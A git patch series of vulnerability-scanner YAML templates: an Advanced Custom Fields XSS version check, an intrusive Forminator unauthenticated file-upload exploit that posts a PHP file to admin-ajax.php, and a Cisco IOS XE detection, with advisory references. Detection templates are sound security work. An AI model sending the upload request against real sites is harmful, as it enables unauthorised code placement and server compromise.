From 089e3242c1e0658175ba0c8d1af3d2f1a6e4a1da Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Tue, 22 Aug 2023 10:57:57 +0200 Subject: [PATCH 01/15] Add files via upload --- http/cves/2023/CVE-2023-40068.yaml | 51 ++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 http/cves/2023/CVE-2023-40068.yaml diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml new file mode 100644 index 00000000000..c46f70af85a --- /dev/null +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -0,0 +1,51 @@ +id: CVE-2023-40068 + +info: + name: XSS in Wordpress plugin, Advanced Custom Fields + author: E1A + severity: Low + description: | + A cross-site scripting (XSS) vulnerability has been found in the Advanced Custom Fields (ACF) and Advanced Custom Fields Pro WordPress plugins. The vulnerability, tracked as CVE-2023-40068, affects versions 6.1.0 to 6.1.7 of the plugins. With a staggering 2 million active installs globally, the implications of such vulnerabilities in the ACF plugins are undoubtedly severe. + reference: + - https://securityonline.info/wordpress-custom-field-plugin-bug-cve-2023-40068-exposes-1m-sites-to-xss-attacks/ + - https://twitter.com/fofabot/status/1693897359217099078 + - https://jvn.jp/en/jp/JVN98946408/index.html + - https://wordpress.org/plugins/advanced-custom-fields + +http: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" + - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields-pro/readme.txt" + payloads: + last_version: + - 6.2.0 + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' \ No newline at end of file From 88728564b2f56d90e93482ed786fa526131a8305 Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Tue, 22 Aug 2023 11:49:23 +0200 Subject: [PATCH 02/15] Update CVE-2023-40068.yaml --- http/cves/2023/CVE-2023-40068.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index c46f70af85a..d13dd1fc98b 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -20,7 +20,7 @@ http: - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields-pro/readme.txt" payloads: last_version: - - 6.2.0 + - 6.2.0 extractors: - type: regex @@ -48,4 +48,4 @@ http: - type: regex part: body regex: - - '(?i)Stable.tag:\s?([\w.]+)' \ No newline at end of file + - '(?i)Stable.tag:\s?([\w.]+)' From 4b8d227a3d31a7ddb01a1e2c0f75124469f3c369 Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Tue, 22 Aug 2023 11:52:15 +0200 Subject: [PATCH 03/15] Update CVE-2023-40068.yaml --- http/cves/2023/CVE-2023-40068.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index d13dd1fc98b..2da6674fa28 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -20,7 +20,7 @@ http: - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields-pro/readme.txt" payloads: last_version: - - 6.2.0 + - 6.2.0 extractors: - type: regex From b6be56c5b452d4663e308a2c9fd98e9101c072cd Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Wed, 30 Aug 2023 21:14:26 +0200 Subject: [PATCH 04/15] Delete http/cves/2023/CVE-2023-40068.yaml --- http/cves/2023/CVE-2023-40068.yaml | 51 ------------------------------ 1 file changed, 51 deletions(-) delete mode 100644 http/cves/2023/CVE-2023-40068.yaml diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml deleted file mode 100644 index 2da6674fa28..00000000000 --- a/http/cves/2023/CVE-2023-40068.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2023-40068 - -info: - name: XSS in Wordpress plugin, Advanced Custom Fields - author: E1A - severity: Low - description: | - A cross-site scripting (XSS) vulnerability has been found in the Advanced Custom Fields (ACF) and Advanced Custom Fields Pro WordPress plugins. The vulnerability, tracked as CVE-2023-40068, affects versions 6.1.0 to 6.1.7 of the plugins. With a staggering 2 million active installs globally, the implications of such vulnerabilities in the ACF plugins are undoubtedly severe. - reference: - - https://securityonline.info/wordpress-custom-field-plugin-bug-cve-2023-40068-exposes-1m-sites-to-xss-attacks/ - - https://twitter.com/fofabot/status/1693897359217099078 - - https://jvn.jp/en/jp/JVN98946408/index.html - - https://wordpress.org/plugins/advanced-custom-fields - -http: - - method: GET - - path: - - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" - - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields-pro/readme.txt" - payloads: - last_version: - - 6.2.0 - - extractors: - - type: regex - part: body - internal: true - name: internal_detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - - type: regex - part: body - name: detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - matchers-condition: or - matchers: - - type: dsl - name: "outdated_version" - dsl: - - compare_versions(internal_detected_version, concat("< ", last_version)) - - - type: regex - part: body - regex: - - '(?i)Stable.tag:\s?([\w.]+)' From bc8f7ce18749074913b1c003d01bb243243a1077 Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Wed, 30 Aug 2023 21:35:56 +0200 Subject: [PATCH 05/15] Create CVE-2023-40068.yaml --- http/cves/2023/CVE-2023-40068.yaml | 85 ++++++++++++++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 http/cves/2023/CVE-2023-40068.yaml diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml new file mode 100644 index 00000000000..92e7e5393fc --- /dev/null +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -0,0 +1,85 @@ +id: CVE-2023-4596 +info: + name: Forminator unauthenticated arbitrary file upload vulnerability + author: E1A + severity: critical + description: The Forminator plugin for WordPress is vulnerable to arbitrary file + uploads due to file type validation occurring after a file has been uploaded to + the server in the upload_post_image() function in versions up to, and including, + 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary + files on the affected site's server which may make remote code execution possible. + reference: + - https://www.exploit-db.com/exploits/51664 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve + - https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-4596 + cwe-id: CWE-434 + metadata: + max-request: 1 + google-query: inurl:"/wp-content/plugins/Forminator" + tags: cve,cve2023,Forminator,wordpress + +http: + - raw: + - | + GET /?p=1 HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe + + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="postdata-1-post-image"; filename="test.php" + Content-Type: application/x-php + + test + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="forminator_nonce" + + {{forminator_nonce}} + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="form_id" + + {{form_id}} + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="current_url" + + {{BaseURL}} + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="action" + + forminator_submit_form_custom-forms + + matchers-condition: and + matchers: + - type: word + part: body + condition: and + words: + - extension is not allowed. + + - type: status + status: + - 200 + + extractors: + - type: regex + name: forminator_nonce + group: 1 + regex: + - '\b[0-9a-fA-F]{10}\b' + internal: true + part: body + + - type: regex + name: form_id + group: 1 + regex: + - '[0-9]' + part: body From 5931319b1d10ece62779978c467d5cab1e768f3c Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Wed, 30 Aug 2023 21:47:39 +0200 Subject: [PATCH 06/15] Update CVE-2023-40068.yaml --- http/cves/2023/CVE-2023-40068.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index 92e7e5393fc..bef0d7bda23 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -25,14 +25,17 @@ info: http: - raw: - | - GET /?p=1 HTTP/1.1 + GET {{Path}} HTTP/1.1 Host: {{Hostname}} Accept: */* - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} + X-Requested-With: XMLHttpRequest Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe + Origin: {{BaseURL}} + Referer: {{BaseURL}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="postdata-1-post-image"; filename="test.php" From 7d93712fd3c473376abc93d0d0b393bdb4ab078c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 31 Aug 2023 01:18:01 +0530 Subject: [PATCH 07/15] misc update --- http/cves/2023/CVE-2023-40068.yaml | 20 ++++++++------------ 1 file changed, 8 insertions(+), 12 deletions(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index 92e7e5393fc..9f51384f06f 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -1,13 +1,11 @@ id: CVE-2023-4596 + info: - name: Forminator unauthenticated arbitrary file upload vulnerability + name: WordPress Plugin Forminator 1.24.6 - Remote Command Execution author: E1A severity: critical - description: The Forminator plugin for WordPress is vulnerable to arbitrary file - uploads due to file type validation occurring after a file has been uploaded to - the server in the upload_post_image() function in versions up to, and including, - 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary - files on the affected site's server which may make remote code execution possible. + description: | + The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. reference: - https://www.exploit-db.com/exploits/51664 - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve @@ -17,10 +15,11 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4596 cwe-id: CWE-434 + epss-score: 0.00343 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/Forminator" - tags: cve,cve2023,Forminator,wordpress + tags: cve,cve2023,Forminator,wordpress,intrusive http: - raw: @@ -55,12 +54,10 @@ http: Content-Disposition: form-data; name="action" forminator_submit_form_custom-forms - + matchers-condition: and matchers: - type: word - part: body - condition: and words: - extension is not allowed. @@ -75,11 +72,10 @@ http: regex: - '\b[0-9a-fA-F]{10}\b' internal: true - part: body - type: regex name: form_id group: 1 regex: - '[0-9]' - part: body + internal: true From 151d5e4dcfb04263fec2964cee096e6a4858e15a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 11 Sep 2023 20:44:40 +0530 Subject: [PATCH 08/15] regex updated --- http/cves/2023/CVE-2023-40068.yaml | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index 6eaa4041892..3cb0eb2a466 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -18,23 +18,19 @@ info: epss-score: 0.00343 metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/Forminator" + publicwww-query: "/wp-content/plugins/Forminator" tags: cve,cve2023,Forminator,wordpress,intrusive http: - raw: - | - GET {{Path}} HTTP/1.1 + GET / HTTP/1.1 Host: {{Hostname}} - Accept: */* + - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - X-Requested-With: XMLHttpRequest - Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe - Origin: {{BaseURL}} - Referer: {{BaseURL}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="postdata-1-post-image"; filename="test.php" @@ -71,14 +67,16 @@ http: extractors: - type: regex name: forminator_nonce + part: body group: 1 regex: - - '\b[0-9a-fA-F]{10}\b' + - 'name="forminator_nonce" value="([a-z0-9]+)" \/>' internal: true - type: regex name: form_id + part: body group: 1 regex: - - '[0-9]' + - 'name="form_id" value="([0-9]+)">' internal: true From 8fe5780891f4bc44c74e3fc06beb9e93f67137f0 Mon Sep 17 00:00:00 2001 From: E1A Date: Wed, 13 Sep 2023 09:24:47 +0200 Subject: [PATCH 09/15] Changed template like the script --- http/cves/2023/CVE-2023-40068.yaml | 23 ++++++++++++----------- 1 file changed, 12 insertions(+), 11 deletions(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index 3cb0eb2a466..d5624a1d9a8 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -10,6 +10,7 @@ info: - https://www.exploit-db.com/exploits/51664 - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve - https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php + - https://github.com/E1A/CVE-2023-4596 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -33,10 +34,16 @@ http: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe ------WebKitFormBoundaryBLOYSueQAdgN2PRe - Content-Disposition: form-data; name="postdata-1-post-image"; filename="test.php" + Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}" Content-Type: application/x-php - test + $output"; + ?> ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="forminator_nonce" @@ -54,15 +61,9 @@ http: forminator_submit_form_custom-forms - matchers-condition: and - matchers: - - type: word - words: - - extension is not allowed. - - - type: status - status: - - 200 + - | + GET /wp-content/uploads/{{date_time("%Y-%M")}}/{{randstr}} HTTP/1.1 + Host: {{Hostname}} extractors: - type: regex From ec427cc415597424a786eafea6ca9eba9f6f7d34 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 13 Sep 2023 14:22:51 +0530 Subject: [PATCH 10/15] matcher updated --- http/cves/2023/CVE-2023-40068.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index d5624a1d9a8..16e4905f4c5 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -34,7 +34,7 @@ http: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe ------WebKitFormBoundaryBLOYSueQAdgN2PRe - Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}" + Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php" Content-Type: application/x-php Date: Tue, 26 Sep 2023 23:39:38 +0530 Subject: [PATCH 11/15] Update CVE-2023-40068.yaml --- http/cves/2023/CVE-2023-40068.yaml | 56 +++++++++++++++++++++--------- 1 file changed, 40 insertions(+), 16 deletions(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index 16e4905f4c5..1b1317cac5c 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -1,7 +1,7 @@ id: CVE-2023-4596 info: - name: WordPress Plugin Forminator 1.24.6 - Remote Command Execution + name: WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload author: E1A severity: critical description: | @@ -11,6 +11,7 @@ info: - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve - https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php - https://github.com/E1A/CVE-2023-4596 + - https://nvd.nist.gov/vuln/detail/CVE-2023-4596 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -19,8 +20,9 @@ info: epss-score: 0.00343 metadata: max-request: 1 + verified: true publicwww-query: "/wp-content/plugins/Forminator" - tags: cve,cve2023,Forminator,wordpress,intrusive + tags: cve,cve2023,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce http: - raw: @@ -29,21 +31,32 @@ http: Host: {{Hostname}} - | + @timeout: 15s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="textarea-1" + + {{randstr}} + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="phone-1" + + {{rand_int(10)}} + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="email-1" + + test@gmail.com + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="name-1" + + {{randstr}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php" Content-Type: application/x-php - $output"; - ?> + ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="forminator_nonce" @@ -60,17 +73,28 @@ http: Content-Disposition: form-data; name="action" forminator_submit_form_custom-forms + ------WebKitFormBoundaryBLOYSueQAdgN2PRe - - | - GET /wp-content/uploads/{{date_time("%Y-%M")}}/{{randstr}}.php HTTP/1.1 - Host: {{Hostname}} - + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: body_1 words: - - "dns" - - "http" + - 'Upload file' + - 'forminator-field-upload' + condition: and + + - type: word + part: body_2 + words: + - '{"success":true' + - '"form_id":"{{form_id}}"' + - '"behav' + condition: and + + - type: status + status: + - 200 extractors: - type: regex From ee37aa6ef324af628cb9403528d842980372a571 Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Wed, 18 Oct 2023 10:46:32 +0200 Subject: [PATCH 12/15] Create CVE-2023-20198.yaml Update from @rxerium his template --- http/cves/CVE-2023-20198.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 http/cves/CVE-2023-20198.yaml diff --git a/http/cves/CVE-2023-20198.yaml b/http/cves/CVE-2023-20198.yaml new file mode 100644 index 00000000000..d5a5e03197a --- /dev/null +++ b/http/cves/CVE-2023-20198.yaml @@ -0,0 +1,25 @@ +id: CVE-2023-20198 +info: + name: Cisco IOS XE Privilege Esculation detection + author: E1A & rxerium + severity: critical + description: | + A vulnerability in the Web User Interface (Web UI) of Cisco IOS XE software allows an attacker to create an account on the affected device with privilege level 15 access, effectively granting them full control of the compromised device and allowing possible subsequent unauthorized activity. + remediation: "Disable the HTTP server feature on internet-facing systems by running one of the following commands in global configuration mode: `no ip http server` or `no ip http secure-server`" + reference: + - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z + - https://www.bleepingcomputer.com/news/security/cisco-warns-of-new-ios-xe-zero-day-actively-exploited-in-attacks/ + - https://socradar.io/cisco-warns-of-exploitation-of-a-maximum-severity-zero-day-vulnerability-in-ios-xe-cve-2023-20198/ + tags: cve,cve2023,cisco + +requests: + - raw: + - |+ + POST /webui/logoutconfirm.html?logon_hash=1 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: regex + part: body + regex: + - '[0-9a-fA-F]+' From e057567c943a4543424afe6a97592cab273b98ec Mon Sep 17 00:00:00 2001 From: no Date: Wed, 18 Oct 2023 10:57:11 +0200 Subject: [PATCH 13/15] update from other pr --- http/cves/2023/CVE-2023-20198.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 http/cves/2023/CVE-2023-20198.yaml diff --git a/http/cves/2023/CVE-2023-20198.yaml b/http/cves/2023/CVE-2023-20198.yaml new file mode 100644 index 00000000000..00388df9099 --- /dev/null +++ b/http/cves/2023/CVE-2023-20198.yaml @@ -0,0 +1,25 @@ +id: CVE-2023-20198 +info: + name: Cisco IOS XE Privilege Esculation detection + author: E1A & rxerium + severity: critical + description: | + A vulnerability in the Web User Interface (Web UI) of Cisco IOS XE software allows an attacker to create an account on the affected device with privilege level 15 access, effectively granting them full control of the compromised device and allowing possible subsequent unauthorized activity. + remediation: "Disable the HTTP server feature on internet-facing systems by running one of the following commands in global configuration mode: `no ip http server` or `no ip http secure-server`" + reference: + - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z + - https://www.bleepingcomputer.com/news/security/cisco-warns-of-new-ios-xe-zero-day-actively-exploited-in-attacks/ + - https://socradar.io/cisco-warns-of-exploitation-of-a-maximum-severity-zero-day-vulnerability-in-ios-xe-cve-2023-20198/ + tags: cve,cve2023,cisco + +requests: + - raw: + - |+ + POST /webui/logoutconfirm.html?logon_hash=1 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: regex + part: body + regex: + - '[0-9a-fA-F]+' \ No newline at end of file From 750068a98d9cf35cf3818be51b47da8dcdaee46f Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Tue, 31 Oct 2023 13:08:32 +0100 Subject: [PATCH 14/15] Delete http/cves/2023/CVE-2023-20198.yaml --- http/cves/2023/CVE-2023-20198.yaml | 25 ------------------------- 1 file changed, 25 deletions(-) delete mode 100644 http/cves/2023/CVE-2023-20198.yaml diff --git a/http/cves/2023/CVE-2023-20198.yaml b/http/cves/2023/CVE-2023-20198.yaml deleted file mode 100644 index 00388df9099..00000000000 --- a/http/cves/2023/CVE-2023-20198.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2023-20198 -info: - name: Cisco IOS XE Privilege Esculation detection - author: E1A & rxerium - severity: critical - description: | - A vulnerability in the Web User Interface (Web UI) of Cisco IOS XE software allows an attacker to create an account on the affected device with privilege level 15 access, effectively granting them full control of the compromised device and allowing possible subsequent unauthorized activity. - remediation: "Disable the HTTP server feature on internet-facing systems by running one of the following commands in global configuration mode: `no ip http server` or `no ip http secure-server`" - reference: - - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z - - https://www.bleepingcomputer.com/news/security/cisco-warns-of-new-ios-xe-zero-day-actively-exploited-in-attacks/ - - https://socradar.io/cisco-warns-of-exploitation-of-a-maximum-severity-zero-day-vulnerability-in-ios-xe-cve-2023-20198/ - tags: cve,cve2023,cisco - -requests: - - raw: - - |+ - POST /webui/logoutconfirm.html?logon_hash=1 HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: regex - part: body - regex: - - '[0-9a-fA-F]+' \ No newline at end of file From 06bff400c6561b784f7f07aa18179c0d71309b07 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 3 Nov 2023 17:34:17 +0530 Subject: [PATCH 15/15] Delete http/cves/CVE-2023-20198.yaml --- http/cves/CVE-2023-20198.yaml | 25 ------------------------- 1 file changed, 25 deletions(-) delete mode 100644 http/cves/CVE-2023-20198.yaml diff --git a/http/cves/CVE-2023-20198.yaml b/http/cves/CVE-2023-20198.yaml deleted file mode 100644 index d5a5e03197a..00000000000 --- a/http/cves/CVE-2023-20198.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2023-20198 -info: - name: Cisco IOS XE Privilege Esculation detection - author: E1A & rxerium - severity: critical - description: | - A vulnerability in the Web User Interface (Web UI) of Cisco IOS XE software allows an attacker to create an account on the affected device with privilege level 15 access, effectively granting them full control of the compromised device and allowing possible subsequent unauthorized activity. - remediation: "Disable the HTTP server feature on internet-facing systems by running one of the following commands in global configuration mode: `no ip http server` or `no ip http secure-server`" - reference: - - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z - - https://www.bleepingcomputer.com/news/security/cisco-warns-of-new-ios-xe-zero-day-actively-exploited-in-attacks/ - - https://socradar.io/cisco-warns-of-exploitation-of-a-maximum-severity-zero-day-vulnerability-in-ios-xe-cve-2023-20198/ - tags: cve,cve2023,cisco - -requests: - - raw: - - |+ - POST /webui/logoutconfirm.html?logon_hash=1 HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: regex - part: body - regex: - - '[0-9a-fA-F]+'